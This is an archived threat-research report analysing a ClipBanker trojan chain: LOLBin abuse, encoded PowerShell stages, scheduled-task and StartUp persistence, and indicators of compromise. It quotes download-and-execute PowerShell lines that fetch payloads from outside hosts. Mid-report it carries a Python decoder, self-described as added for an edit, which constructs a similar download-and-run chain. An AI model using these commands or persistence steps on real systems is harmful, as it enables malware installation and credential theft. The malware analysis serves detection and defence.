{
	"id": "2f70b1b3-b566-4155-99cd-749fcb5e43ae",
	"created_at": "2026-04-06T00:19:20.784561Z",
	"updated_at": "2026-04-10T03:21:30.38984Z",
	"deleted_at": null,
	"sha1_hash": "c2640bb1a0b9138c67054e592c7229212b2fae34",
	"title": "Threat Research Report: Clipbanker - 13 Second Attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5821953,
	"plain_text": "Threat Research Report: Clipbanker - 13 Second Attack\r\nArchived: 2026-04-02 12:21:38 UTC\r\nWritten by: Max Malyutin\r\nEXECUTIVE SUMMARY\r\nIn this article, the Cynet Research team reveals a multi-stage attack that runs for only 13 seconds, chaining\r\nseveral malware components and different tactics. Our analysis identified the threat found in this investigation as\r\nthe “ClipBanker” trojan.\r\nThe attack flow contains several stages: LOLBin (Living Off the Land binary) abuse, masquerading, persistence,\r\nenumeration techniques, credential theft, fileless execution, and finally banking trojan activity.\r\nThe attack also uses fileless techniques to evade security detection. Fileless attacks have been a growing threat\r\nsince 2017 and require behavior-based detection and prevention tools to detect and block them, since there is no dropped\r\nfile for a signature scanner to inspect. The most common Windows tools used in fileless attacks are PowerShell, JScript,\r\nVBA and WMI. PowerShell is especially popular for fileless attacks because PowerShell commands execute natively\r\non Windows without the payload ever being written to disk.\r\nThe ClipBanker trojan is known as an information stealer and spy trojan: it aims to steal and record any type of\r\nsensitive information from the infected environment, such as browser history, cookies, Outlook data, Skype,\r\nTelegram, or cryptocurrency wallet addresses. The main goal of this threat is to steal confidential information.\r\nThe ClipBanker uses PowerShell commands to execute its malicious activities. 
The thing that makes ClipBanker\r\nunique is its ability to monitor the user’s banking-related actions (notably the clipboard, as the static analysis below shows)\r\nand manipulate them for the attacker’s benefit.\r\nClipBanker is distributed through phishing emails or through social media posts that lure users\r\ninto downloading malicious content.\r\nCynet 360 protects your assets against this type of attack.\r\nhttps://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/\r\nPage 1 of 25\n\nThis is part of an extensive series of guides about Malware Protection\r\nMITRE ATT\u0026CK\r\nThe attack flow described below maps to several known MITRE ATT\u0026CK tactics and techniques.\r\nThe strategic goal of the attacker is to steal information. To get there, the attacker must go through\r\nseveral steps to complete the malicious activity and gain access to sensitive data in the\r\ncompromised environment.\r\nIn this case, the attacker begins by gaining Initial Access (TA0001) to the victim’s environment, in order to\r\nestablish an initial foothold on the victim machine. Then comes Execution (TA0002), in\r\norder to run the malicious code, and Persistence (TA0003), in order to survive on the victim system.\r\nThe attacker needs to keep the malicious activity going in order to reach the sensitive information in the infected\r\nenvironment: browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet addresses. Gathering it\r\nis the Collection (TA0009) tactic. Along the way, the attacker uses Defense\r\nEvasion (TA0005) techniques to keep security products from detecting the malicious activity. 
In order to\r\nreceive instructions from a remote server and keep the attack flow going, the attacker also relies on the\r\nCommand and Control (TA0011) tactic.\r\n13 SECONDS ATTACK FLOW\r\nAttack started at 7:47:43.000 PM:\r\nFirst Trojan Downloader:\r\nThe Cynet 360 platform detected a Trojan Downloader. A downloader is a program that downloads another malware\r\ncomponent from the network by connecting to a Command and Control server.\r\nThe Trojan Downloader was detected as a child process of the RegAsm.exe binary. RegAsm is the .NET Assembly\r\nRegistration tool; it reads the metadata within an assembly and adds the necessary entries to the registry, which\r\nallows COM clients to create .NET Framework classes transparently (Microsoft Developer Network). As a LOLBin,\r\nRegAsm can be abused to run malicious code (including PE file execution) under a trusted, signed Microsoft\r\nbinary in order to bypass security products.\r\nAs you can see in the screenshot below, Cynet detected EguiProxy.exe (the Trojan Downloader), which was\r\nlaunched by RegAsm.exe (LOLBin):\r\nFirst Downloader: EguiProxy.exe\r\nMD5: f70428c34a100f9b3a6dbe58aea05def\r\nSHA-1: 9dd57f78f6f488bc7e96b592a7201040049f4933\r\nSHA-256: 4a471f05c7624238ef374bbf3af4eeb2abc20f87579ecdbeefea61356e23ae69\r\nSSDEEP:\r\n96:Iz3j1+n7W7AtmLykrFVEODJtutwc79LaB+UMWmLgt3x3kJ+iGczNt:mQ74OhkphDEwq9LaB+UMWmLgt32gm\r\nSecond Trojan Downloader:\r\nThe Trojan Downloader then downloads another malware component from “hxxp://bzqopgtera[.]xyz/” that is used as an\r\ninjector/downloader and executes a new payload from the \\AppData\\Local\\Temp\\ directory:\r\nSecond Downloader: 
1849226900.exe\r\nMD5: e5e13f095613837ff741cf9fb2b68eb0\r\nSHA-1: e7b63fbd6dc176fa29e208dc1de083c882a6ef01\r\nSHA-256: 1f0ddf5088ac75862fe1d1c4f11f9c39645eee1e4acc938a1f66f14dfc5d5288\r\nSSDEEP:\r\n12288:D9ciEWzp4fqhCC77upiLcRGjbWWkKkc9Tm4RtxQBWUX2Fqmvu5UshghN:3jcqhJipiwojbWWkY9Tjm2eyh\r\nThe second downloader also initiated network communication with the same Command and Control server\r\nmentioned above (the same C\u0026C as the first downloader).\r\nThe main purpose of this second trojan is to execute a malicious PowerShell command by running cmd.exe. It is\r\nworth mentioning that the cmd.exe instance was executed from the SysWOW64 directory (the 32-bit copy on a 64-bit\r\nWindows host), which is similar to many other malicious activities Cynet Research has investigated recently. The cmd.exe\r\ninstance ran with the /c argument (run the command, then terminate) in order to execute the malicious\r\nPowerShell command described below.\r\nThe PowerShell command ran with the following parameters:\r\n-w 1 – WindowStyle Hidden, which hides the PowerShell window.\r\n-e – EncodedCommand, which accepts the command as a base64 string (the encoded bytes are the UTF-16LE text of the\r\ncommand, so decoding the blob as plain ASCII yields NUL-interleaved output).\r\nAfter decoding the base64-encoded PowerShell command, we found that the attack switched from a file-based attack to\r\na fileless attack. In the screenshot below, you can see that the command contains two interesting\r\nparts:\r\n1. 
The first part of the PowerShell command is the $thdTask variable, which contains another base64 string.\r\nAfter decoding that base64 string, we got the following command:\r\nThe above command uses “System.Net.WebClient” and “DownloadString” to connect to\r\ngitlab.com (hxxps://gitlab[.]com/UL9gbzuP37/rt/snippets/1956305/raw) and to download what becomes the cs.exe file in the\r\n\\temp\\ directory.\r\nWhen accessing the malicious URL, we saw that it serves a large base64 string, as you can see below:\r\nAfter decoding the base64 string, we found that it is a PE file (an MZ file). The payload is written to $env:temp\r\n(the environment variable of the TEMP directory, C:\\Users\\user\\AppData\\Local\\Temp) as “cs.exe”:\r\n[IO.File]::WriteAllBytes(“$env:temp\\cs.exe”, [Convert]::FromBase64String($base64string))\r\nFinally, the payload is executed with the Start-Process cmdlet:\r\nstart-process “$env:temp\\cs.exe”\r\nTo understand the malicious purpose of this payload we have to dig deeper and analyze it with static and\r\ndynamic analysis.\r\n2. 
The second part of the command sets a new value under the “HKCU\\Sofatwarte\\cr” registry key (note the\r\nmisspelled “Sofatwarte”: this is the attacker’s own key, not the legitimate Software hive), which is\r\ndescribed further in the technical analysis.\r\nTechnical Analysis\r\nAfter downloading and investigating cs.exe (the payload extracted above), we concluded that this\r\npayload is the Trojan Banker itself, which aims to steal banking data from infected machines.\r\nFile name: cs.exe\r\nMD5: 884da153fa3617c79a67b1941e4493ed\r\nSHA-1: e1346bc15d103f0bb96d3f93a1a042f030134c8b\r\nSHA-256: e09013a2ac876746a5143f8ee8f997b06688b71adc05ddb81aeb9a1a69fa6f88\r\nSSDEEP:\r\n6144:Y4lCfqy7+mdXzEQj0oFIxRr4VsXR7P9/Z2Q+5AOh1faY:zlCfqy7+mdXzEQnYr4VsXRFf+5xaY\r\nStatic analysis\r\nThe Trojan Banker’s static metadata and history (from VirusTotal.com)\r\nFrom the static analysis of the cs.exe payload we found some hints about the malicious activity and basic\r\nfunctionality that it executes on the compromised environment.\r\nThe following screenshot of the malicious file shows that the file’s sections are neither packed nor\r\nencrypted, so the disassembly is readable and we can start working out the malicious context and purpose of this\r\nTrojan Banker:\r\nThe first step in understanding the functionality of the payload is to check the imports and\r\nthe API calls used by the payload.\r\nThe main functions we discovered are:\r\nCreateProcess: creates a new process and its primary thread. The new\r\nprocess runs in the security context of the calling process. Most of the time, attackers use this API\r\ncall to execute the malicious process:\r\nCreateDirectory: creates a new directory. 
If the underlying file system\r\nsupports security on files and directories, the function applies a specified security descriptor to the new\r\ndirectory. Usually, attackers use this API call to create the directory where the\r\nmalicious component will be stored in order to gain persistence on the victim’s host.\r\nWriteFile: writes data to the specified file or input/output (I/O) device.\r\nUsually, adversaries use this API call to create (write) a malicious file component. It can also be\r\nused for persistence and post-exploitation.\r\nGetCommandLine: retrieves the command-line string of the current\r\nprocess. By itself it executes nothing; malware calls it to read the arguments it was launched with and\r\nbranch on them.\r\nAll the above-mentioned API calls are exported by Kernel32.dll. This DLL exports functions\r\nthat relate to filesystem operations, hardware, and processes.\r\nThe next interesting functionality, implied by the API functions below, is that the attacker may have the\r\nability to hook, record, and steal clipboard data, which can contain sensitive information (usernames,\r\npasswords, cryptocurrency wallet addresses, etc.). 
The keyboard-monitoring (keylogging) capability comes from user32.dll imports.\r\nThe final API function covered in this section is GetUserName, which the\r\nattacker can use for enumeration and discovery.\r\nAfter discovering and understanding the functionality of the cs.exe payload, we exported the strings from the\r\npayload. The strings are good indicators of the malicious actions the malware will perform, and they\r\neventually lead us to new hints about the attack stages of the Trojan Banker:\r\nThe main strings we investigated are the following:\r\nCreation of a new file (hysvc.exe) in the ProgramData directory (this file is created using the Windows API).\r\nManipulation of the StartUp directory (can be used for persistence).\r\nExecution of cmd.exe.\r\nCreation of a scheduled task (can be used for persistence) to run the new hysvc.exe file.\r\nCreation of an LNK file that points to the new hysvc.exe file.\r\nExecution of a base64-encoded PowerShell command.\r\nIn order to understand the above-mentioned strings, we looked at the assembly code using IDA.\r\nThe first block containing an interesting offset that we discovered and analyzed is aCProgramdataHy, which is\r\nassociated with the new payload that will be created in the ProgramData directory.\r\nThe second block showed a few other interesting offsets:\r\naCMDCTimeoutT4\r\naCMDSchtaskFC\r\naMKlinkCProgram\r\naPowershellW1Ex\r\nThe aCMDCTimeoutT4 offset contains a cmd.exe command line that runs “timeout /t 4”, which pauses the command\r\nprocessor for 4 seconds before launching the next cmd.exe process. 
Such a delay is a common defense-evasion trick aimed at sandboxes and traditional\r\nanti-virus engines, which may stop watching before the delayed command runs.\r\nThe aCMDSchtaskFC offset contains another cmd.exe command line that runs “schtasks” to create a\r\nscheduled task on the compromised host. The name of the scheduled task is “GoogleChromUpdateTask” (/tn –\r\ntask name) and the task is scheduled to run hysvc.exe every hour (/sc – schedule).\r\nThe aMKlinkCProgram offset contains a “mklink” command that creates a file-system link in the StartUp\r\ndirectory pointing to the hysvc.exe file (mklink creates symbolic or hard links, not .lnk shortcut files; the\r\nshortcut is created separately by the PowerShell command described below).\r\nThe aPowershellW1Ex offset contains a base64-encoded PowerShell command that will be executed by the main payload\r\n(cs.exe).\r\nAfter performing static and code analysis, we now move on to executing the cs.exe payload and performing\r\ndynamic/behavior analysis.\r\nBehavior Analysis\r\nOnce we launched the payload, we immediately saw the following process tree:\r\nAs we learned from the static analysis, the CreateProcess API function executes a cmd.exe instance\r\nand creates a scheduled task:\r\nCMD timeout command:\r\nschtasks command:\r\nIn order to gain persistence on the compromised host, the attacker created a scheduled task in the Task Scheduler.\r\nMoreover, the attacker tried to masquerade it under a legitimate-looking name, “GoogleChromUpdateTask” (note the\r\nmissing “e” in Chrome), as we can see in the screenshot below:\r\nThe task information shows that it runs the file every 3 hours:\r\nThe CreateFile and CreateDirectory functions create a new payload (hysvc.exe) in the ProgramData directory:\r\nAfter checking the hash of the new hysvc.exe 
payload, we found that it is the same file as the original cs.exe\r\npayload (identical hash). Thus, the initial trojan simply copied itself to a new location:\r\nAfter creating the second payload (hysvc.exe) and a scheduled task to run it, the initial payload (cs.exe)\r\nlaunches PowerShell in order to run an encoded malicious command:\r\nThe decoded command, shown above, uses a “Wscript.Shell” COM object to create a shortcut file\r\n(LNK) in the StartUp directory that points to the hysvc.exe payload. This is a\r\nsecond persistence technique: Windows runs the LNK file from the StartUp folder automatically every time the victim\r\nlogs on to the compromised machine:\r\n“AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp”\r\nThe LNK file points to the Trojan Banker (hysvc.exe), which is now located in the ProgramData directory.\r\nMemory context of the payload:\r\nAfter finishing the investigation and analysis of the Trojan Banker, we can go back to the second part of the first\r\nPowerShell command.\r\nThe second part of the command sets a new value under the “HKCU\\Sofatwarte\\cr” registry key. The value relates\r\nto the $thdTask variable, the base64 stage that fetches and runs the Trojan Banker analyzed above.\r\nIt also creates a scheduled task, through a cmd.exe instance, named “Update Shell”. 
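Decoding this chain by hand is error-prone (the -e blob is UTF-16LE, and the stages nest), so the following Python script is an added example written for this edit, not Cynet’s code and not tooling from the report: it decodes a powershell -e argument, recursively unpacks the base64 blobs found inside it (the $thdTask stage and the encoded command carried in the “Update Shell” task action), recognises an embedded MZ/PE image such as the one served by the GitLab snippet, and extracts URLs, registry paths, scheduled-task names and dropped executables as defanged indicators. The command chain in build_sample_chain() is reconstructed from this report’s description and is a constructed input, not the captured malware command text; the same decoder applies to the later $K/kumi/“OneDrive SyncTask” stage.\r\n
```python
'''
Decode and triage a nested, base64-encoded PowerShell command chain of the kind
described in the ClipBanker report.  Added example for this edit (not Cynet's
code); build_sample_chain() reconstructs the chain from the report's description
and is a constructed input, not the captured malware command.
'''
import base64
import re

# powershell.exe -e / -EncodedCommand takes base64 of the UTF-16LE command text.
# Decoding the blob as ASCII instead yields NUL-interleaved output, which is the
# first trap when triaging these commands by hand.
def encode_powershell(command):
    return base64.b64encode(command.encode('utf-16-le')).decode('ascii')

B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')            # candidate nested blobs
URL_RE = re.compile(r'https?://[^ <>)\"]+', re.IGNORECASE)
REG_RE = re.compile(r'HKCU:?[^ ;,)\"]+', re.IGNORECASE)
TASK_RE = re.compile(r'/tn \"([^\"]+)\"', re.IGNORECASE)     # schtasks /tn name
EXE_RE = re.compile(r'[^ \"]+[.]exe', re.IGNORECASE)
# Cmdlets and methods that together form the report's download-decode-run pattern.
SUSPICIOUS = ('-w 1', '-e ', 'iex', 'invoke-expression', 'downloadstring',
              'frombase64string', 'writeallbytes', 'start-process', 'schtasks',
              'new-itemproperty', 'get-itemproperty')


def bytes_to_text(raw):
    '''Return raw as text if it looks like UTF-16LE (ASCII range) or UTF-8 text.'''
    if len(raw) >= 2 and len(raw) % 2 == 0 and all(raw[i] == 0 for i in range(1, len(raw), 2)):
        return raw.decode('utf-16-le')
    try:
        text = raw.decode('utf-8')
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch.isspace() for ch in text):
        return text
    return None


def decode_layers(text, depth=0):
    '''Return (layers, pe_count): every command layer reachable from text by
    decoding nested base64 blobs, plus the number of embedded PE images (MZ).'''
    layers = [text]
    pe_count = 0
    if depth >= 5:                          # cap recursion on hostile input
        return layers, pe_count
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:                  # binascii.Error is a ValueError
            continue
        if raw[:2] == b'MZ':                # the GitLab snippet case: a PE, not a script
            pe_count += 1
            continue
        inner = bytes_to_text(raw)
        if inner is None:
            continue
        sub_layers, sub_pe = decode_layers(inner, depth + 1)
        layers.extend(sub_layers)
        pe_count += sub_pe
    return layers, pe_count


def defang(url):
    return url.replace('http', 'hxxp').replace('.', '[.]')


def analyze(encoded_command):
    '''Triage summary for the value passed to powershell -e.'''
    outer = base64.b64decode(encoded_command).decode('utf-16-le')
    layers, pe_count = decode_layers(outer)
    # Drop the blobs themselves before matching so base64 noise cannot pose as an IOC.
    stripped = ' '.join(B64_RE.sub(' ', layer) for layer in layers)
    lowered = stripped.lower()
    return {
        'layers': len(layers),
        'embedded_pe': pe_count,
        'urls': sorted(set(defang(u) for u in URL_RE.findall(stripped))),
        'registry': sorted(set(REG_RE.findall(stripped))),
        'tasks': sorted(set(TASK_RE.findall(stripped))),
        'executables': sorted(set(EXE_RE.findall(stripped))),
        'indicators': [s for s in SUSPICIOUS if s in lowered],
    }


def build_sample_chain():
    '''Constructed three-level chain following the report: the outer -e command
    stores $thdTask under HKCU\\Sofatwarte\\cr, registers the Update Shell task whose
    action re-runs that stage from the registry, and runs $thdTask (the cs.exe
    downloader).  Hypothetical text, assembled for this example.'''
    from_registry = ('iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('
                     '(Get-ItemProperty -Path \"HKCU:\\Sofatwarte\").cr)))')
    downloader = ('$base64string = (New-Object System.Net.WebClient).DownloadString('
                  '\"https://gitlab.com/UL9gbzuP37/rt/snippets/1956305/raw\"); '
                  '[IO.File]::WriteAllBytes(\"$env:temp\\cs.exe\", '
                  '[Convert]::FromBase64String($base64string)); '
                  'start-process \"$env:temp\\cs.exe\"')
    thd_task = base64.b64encode(downloader.encode('ascii')).decode('ascii')
    outer = ('$thdTask = \"' + thd_task + '\"; '
             'New-ItemProperty -Path \"HKCU:\\Sofatwarte\" -Name \"cr\" -Value $thdTask -Force; '
             'schtasks /create /tn \"Update Shell\" /sc hourly /f '
             '/tr \"cmd /c powershell -w 1 -e ' + encode_powershell(from_registry) + '\"; '
             'iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String($thdTask)))')
    return encode_powershell(outer)


# Stand-in for the GitLab snippet body: base64 of a fake MZ header, constructed here.
SAMPLE_SNIPPET_BODY = base64.b64encode(b'MZ' + bytes(62)).decode('ascii')

if __name__ == '__main__':
    for key, value in analyze(build_sample_chain()).items():
        print(key, value)
    print('snippet carries PE:', decode_layers(SAMPLE_SNIPPET_BODY)[1] == 1)
```
Run it with python3 to print the triage summary. analyze() returns a dictionary so the same function can be called from a SIEM enrichment step or a Sysmon event parser, the blobs are stripped before indicator matching so base64 text cannot masquerade as a registry path, and the depth cap in decode_layers() keeps a deliberately self-referencing blob from recursing forever.\r\n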
The “Update Shell” task runs a base64-encoded\r\nPowerShell command.\r\nAfter decoding the base64 command, we found that it reads the “HKCU\\Sofatwarte\\cr” value and invokes its\r\ncontent, which means the Trojan Banker (hysvc.exe) is launched by PowerShell directly from the registry:\r\nIn parallel, the downloader “1849226900.exe”, which was responsible for downloading the main payload (cs.exe),\r\nexecutes another cmd.exe instance in order to run an additional PowerShell command:\r\nAfter decoding the PowerShell command, we discovered the following:\r\nThe first part is the $K variable, which contains a base64-encoded command.\r\nAfter decoding that command, we see that it launches a purely fileless stage that runs from PowerShell’s\r\nmemory. The command initiates network communication with the following URL:\r\n“hxxps://asq.d6shiiwz[.]pw/win/ins/checking[.]ps1” in order to invoke the content of the “checking.ps1” script.\r\nThis is done with the IEX (Invoke-Expression) cmdlet, which executes the script content returned by the\r\nDownloadString method.\r\nUnfortunately, the URL no longer exists; when we tried to access it, we got no response:\r\nIn order to verify that the malicious URL really is down, we also ran a curl command, because in some\r\ncases an attacker can serve a decoy HTML page that looks like “no response” in a browser while the malicious\r\ndomain is still actively serving the payload.\r\nIn the second part of the PowerShell command, it sets a new value under the “HKCU:\\Sofatware” registry key. The\r\nvalue name is “kumi” and it contains the $K variable, i.e. the stage that fetches and executes the malicious PS1 script.\r\nFurthermore, it creates a scheduled task named “OneDrive SyncTask”. 
The “OneDrive SyncTask” task runs a PowerShell\r\ncommand.\r\nTo understand the purpose of the command, we decoded the base64 command:\r\nThe command simply executes, via the IEX cmdlet, the kumi value, which contains the malicious PS1 stage.\r\nAttack ended at 7:47:56.000 PM (13 seconds after it started)\r\nINDICATORS OF COMPROMISE\r\nType Indicator\r\nRegistry\r\nHKCU:\\Sofatware (value – Kumi)\r\nHKCU\\Sofatwarte\\cr\r\nScheduled Task\r\nOneDrive SyncTask\r\nGoogleChromUpdateTask\r\nUpdate Shell\r\nSHA256\r\n4a471f05c7624238ef374bbf3af4eeb2abc20f87579ecdbeefea61356e23ae69 (EguiProxy.exe)\r\n1f0ddf5088ac75862fe1d1c4f11f9c39645eee1e4acc938a1f66f14dfc5d5288 (1849226900.exe)\r\ne09013a2ac876746a5143f8ee8f997b06688b71adc05ddb81aeb9a1a69fa6f88 (cs.exe / hysvc.exe)\r\nURL\r\nhxxps://asq.d6shiiwz[.]pw/win/ins/checking[.]ps1\r\nhxxps://gitlab[.]com/UL9gbzuP37/rt/snippets/1956305/raw\r\nhxxp://bzqopgtera[.]xyz/\r\nConclusion\r\nThe Cynet Research Team has analyzed and investigated different threats and malware using various tools and\r\ntechniques. Cynet’s seasoned security experts are familiar with the newest attack vectors and techniques that exist\r\nin the wild.\r\nCynet 360 customers are fully protected from these kinds of threats and have full visibility over their protected\r\nassets. Cynet has various behavioral and heuristic capabilities designed to detect and prevent advanced threats like\r\nthe one described in this report.\r\nThe Cynet 360 solution gives our customers the ability to control and manage cyber security incidents, to perform\r\nforensic analysis on infected environments, and to run remote actions on the infected hosts in order to mitigate the\r\nthreat. 
On top of that, our CyOps team monitors our customers’ environments 24/7/365.\r\nContact Cynet CyOps\r\n(Cynet Security Operations Center)\r\nCynet CyOps is available to clients 24/7 for any issues, questions or comments related to Cynet 360. For\r\nadditional information, you may contact us directly at:\r\nPhone (US): +1-347-474-0048\r\nPhone (EU): +44-203-290-9051\r\nPhone (IL): +972-72-336-9736\r\nCyOps Email: soc@cynet.com\r\nTips From Expert\r\nIn my experience, here are tips that can help you better defend against advanced, multi-stage attacks like the\r\nClipBanker Trojan:\r\n1. Harden Against LOLBin Abuse: Restricting the use of trusted binaries and implementing application\r\ncontrol policies helps prevent attackers from abusing legitimate tools to execute malicious code.\r\n2. Deep Monitoring of PowerShell Execution: Monitoring PowerShell activity for abnormal usage and\r\ntracking script execution provides valuable insights into potential malicious activity.\r\n3. Proactive URL Scanning for Malicious Domains: Continuously scanning and blacklisting suspicious\r\ndomains helps prevent users from accessing malicious websites and downloading malicious files.\r\n4. Enforce Secure Email Gateways: Strengthening email security helps detect and block phishing attempts,\r\nwhich are often used to deliver malware like ClipBanker.\r\n5. 
Deploy Memory Analysis Tools for Early Detection: Memory-based analysis can catch malware in action,\r\neven when there are no files written to disk, allowing for earlier detection and response.\r\nAviad Hasnis is the Chief Technology Officer at Cynet.\r\nHe brings a strong background in developing cutting edge technologies that have had a major impact on the security\r\nof the State of Israel. At Cynet, Aviad continues to lead extensive cybersecurity research projects and drive\r\ninnovation forward.\r\nSource: https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/"
	],
	"report_names": [
		"threat-research-report-clipbanker-13-second-attack"
	],
	"threat_actors": [],
	"ts_created_at": 1775434760,
	"ts_updated_at": 1775791290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c2640bb1a0b9138c67054e592c7229212b2fae34.pdf",
		"text": "https://archive.orkl.eu/c2640bb1a0b9138c67054e592c7229212b2fae34.txt",
		"img": "https://archive.orkl.eu/c2640bb1a0b9138c67054e592c7229212b2fae34.jpg"
	}
}